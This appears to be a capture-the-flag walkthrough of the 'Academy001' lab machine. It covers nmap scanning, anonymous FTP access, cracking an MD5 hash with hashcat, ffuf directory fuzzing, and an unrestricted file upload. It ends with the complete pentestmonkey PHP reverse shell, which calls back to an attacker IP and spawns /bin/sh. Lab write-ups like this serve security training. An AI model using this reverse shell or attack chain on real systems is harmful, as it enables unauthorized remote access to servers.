Exploiting Academy001 vulnerable Machine

10 min readOct 8, 2023

Check network integration

The first step is to check if attack machine and vulnerable machine can ping each other, we can use the ping command. Here’s how we did it:

Find the IP Addresses:

Use ifconfig command on kali (Attack machine) to find IP address.

Use ip addr command on vulnerable machine to find its ip address.

Ping from Vulnerable Machine to Attack Machine:

On your vulnerable machine, use the ping command to check if it can reach the attack machine. Press Ctrl + C to stop the ping process.

Ping from Attack Machine to Vulnerable Machine:

On your attack machine (Kali Linux), open a terminal and use the ping command to check if it can reach the vulnerable machine. Press Ctrl + C to stop the ping process.

We have received responses to the ping requests in both directions, it means that our attack machine and vulnerable machine are able to communicate over the network and can ping each other successfully. If you encounter any issues, you might want to check network configurations, firewalls, or connectivity problems on the machines or the network.

Scanning vulnerable machine

Now, Scan vulnerable machine using nmap with the following command

nmap -A -sC -sV -O 10.0.2.15

-A flag is used to enable aggressive scanning. It's a shortcut that combines several other flags and options to provide more comprehensive information about the target host.
-sC flag enables script scanning using NSE scripts. NSE scripts are custom scripts that can be used to automate a wide range of tasks, including vulnerability detection, service enumeration, and more.
-sV flag is used for version detection. It attempts to determine the version of the service running on each open port. This can be valuable for identifying potentially vulnerable software.
-O flag is used to perform OS detection. It tries to determine the operating system of the target host based on various factors, such as TCP/IP fingerprinting.
10.0.2.15 is the IP address of the vulnerable machine.

Anonymous FTP login

We can see “Anonymous FTP login allowed” in the scanning results, it means that the FTP (File Transfer Protocol) server on the target system is configured to allow anonymous logins. Anonymous FTP login allows users to connect to an FTP server without providing a username or password. Instead, users are allowed to log in using the username “anonymous” or “ftp” and typically use their email address as the password.

The purpose of anonymous FTP access is to provide a way for users to download publicly available files from a server without the need for authentication. It’s commonly used by software repositories, public file archives, and websites that distribute open-source software or other publicly accessible data.

However, it’s important to note that allowing anonymous FTP access can pose security risks if not properly configured. If the anonymous user has write permissions in sensitive areas, it could potentially lead to unauthorized access or data breaches.

When conducting security assessments, finding anonymous FTP login allowed indicates a potential security vulnerability. It’s crucial to assess the configuration of the FTP server further to ensure that anonymous users have limited access to prevent unauthorized access and data manipulation. Security best practices include restricting the directories accessible to anonymous users and setting appropriate permissions to prevent unauthorized activities.

Login to FTP server:

To log in to FTP server we can use the ftp command followed by the target IP. After running the ftp command, we are prompted to enter a username and password. Use “anonymous” as username and password.

ftp 10.0.2.15

Navigate through ftp:

We have successfully logged in to ftp server. Now, we can use FTP commands to navigate the server, list files ls, change directory cd upload put and download get files, and perform other file transfer operations.

We found note.txt file. Let’s download the file with get command.

Let’s quit and check if we have got the file.

Let’s check what information we got in that file using cat command.

We have got Student registration number and password hash. We can crack the hash using hashcat.

HashCat

A powerful open-source password recovery tool used by security professionals, penetration testers, and researchers. Designed for the purpose of recovering lost or forgotten passwords through various cracking methods. Supports cracking a wide range of password hashes and encryption algorithms, making it a valuable tool for security assessments, forensic analysis, and testing the strength of passwords.

Password Hash Cracking

Hashcat is primarily used for cracking password hashes. It supports a variety of cryptographic hash functions, including MD5, SHA-1, SHA-256, bcrypt, and more. We can identify hash we got in note.txt file with hash-identifier

Possibly it could be MD5 hash. Let’s copy that into a text file and crack it using hashcat.

Crack md5 hash:

Use following command to crack hash

sudo hashcat -m 0 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

m 0 indicates that the hash mode is 0, which corresponds to MD5 hashes.
a 0 indicates a dictionary attack, where Hashcat will try each word in the wordlist as a potential password.
o option specifies the output file where successfully cracked passwords will be saved.
cracked.txt option specifies the name of output file where cracked password will be saved.
hash.txt is the file that contains the MD5 hash that we want to crack. Hashcat will attempt to find a match for this hash in the wordlist.
/usr/share/wordlists/rockyou.txt is the path to the wordlist file that Hashcat will use for the dictionary attack. The "rockyou.txt" wordlist is a popular and extensive wordlist often used for password cracking.

Hashcat has successfully cracked the MD5 hash. Now, use command cat cracked.txt to see the cracked password.

Check target IP in browser

We have found default page of Apache2 server on target IP. We can use FFuF tool to discover potential vulnerabilities or hidden resources.

FFuF

Fuzz Faster U Fool is a popular web application security testing tool that’s used for fuzzing, which is the process of testing software applications for vulnerabilities by providing unexpected or invalid input. Its basic usage involves specifying a target URL and a wordlist. The tool will then iterate through the wordlist, making requests to the target URL with different payloads to discover potential vulnerabilities or hidden resources.

Discovering directories on target:

ffuf -u http://10.0.2.15/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

ffuf is the command to run FFuF.
u [<http://10.0.2.15/FUZZ>](<http://10.0.2.15/FUZZf>) flag specifies the target URL for fuzzing. In this case, FFuF will replace FUZZ in the URL with entries from the wordlist.
w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt The w flag specifies the wordlist file to use for fuzzing. The specified wordlist contains a list of directory and path names that FFuF will try to access on the target URL

The result shows two paths that could be interesting. Let’s try to access these through browser.

Getting access to busted paths

Open web browser and go to 10.0.2.15/academy

Let’s try the username and password we got from note.txt file

We have successfully logged in using the student registration number and cracked password. Let’s navigate through pages.

Change records:

Lets try to update student information. We can try to upload picture. I got the image from https://thispersondoesnotexist.com/.

As we can see that “Student record updated successfully”. We have already seen during directory busting that the website is using php server.

Execute php script:

Uploading sample php script instead of image to check if server is configured to execute php scripts.

After uploading php script file the image won’t show up. Right click on the image and select open image in new tab.

The example script is executed. Enter name and submit.

The script is executed and working fine.

Reverse shell attack

Copy the given php script given below and save it as reverse_shell.php

Change the ip and port on which you want to start the listener. In my case I choose port 1299.

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.0.2.4';  // CHANGE THIS IP to your kali machine IP 
$port = 1299;       // CHANGE THIS port to the port of your choice
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
 // Fork and have the parent process exit
 $pid = pcntl_fork();
 
 if ($pid == -1) {
  printit("ERROR: Can't fork");
  exit(1);
 }
 
 if ($pid) {
  exit(0);  // Parent exits
 }

 // Make the current process a session leader
 // Will only succeed if we forked
 if (posix_setsid() == -1) {
  printit("Error: Can't setsid()");
  exit(1);
 }

 $daemon = 1;
} else {
 printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
 printit("$errstr ($errno)");
 exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
 printit("ERROR: Can't spawn shell");
 exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
 // Check for end of TCP connection
 if (feof($sock)) {
  printit("ERROR: Shell connection terminated");
  break;
 }

 // Check for end of STDOUT
 if (feof($pipes[1])) {
  printit("ERROR: Shell process terminated");
  break;
 }

 // Wait until a command is end down $sock, or some
 // command output is available on STDOUT or STDERR
 $read_a = array($sock, $pipes[1], $pipes[2]);
 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

 // If we can read from the TCP socket, send
 // data to process's STDIN
 if (in_array($sock, $read_a)) {
  if ($debug) printit("SOCK READ");
  $input = fread($sock, $chunk_size);
  if ($debug) printit("SOCK: $input");
  fwrite($pipes[0], $input);
 }

 // If we can read from the process's STDOUT
 // send data down tcp connection
 if (in_array($pipes[1], $read_a)) {
  if ($debug) printit("STDOUT READ");
  $input = fread($pipes[1], $chunk_size);
  if ($debug) printit("STDOUT: $input");
  fwrite($sock, $input);
 }

 // If we can read from the process's STDERR
 // send data down tcp connection
 if (in_array($pipes[2], $read_a)) {
  if ($debug) printit("STDERR READ");
  $input = fread($pipes[2], $chunk_size);
  if ($debug) printit("STDERR: $input");
  fwrite($sock, $input);
 }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
 if (!$daemon) {
  print "$string\n";
 }
}

?>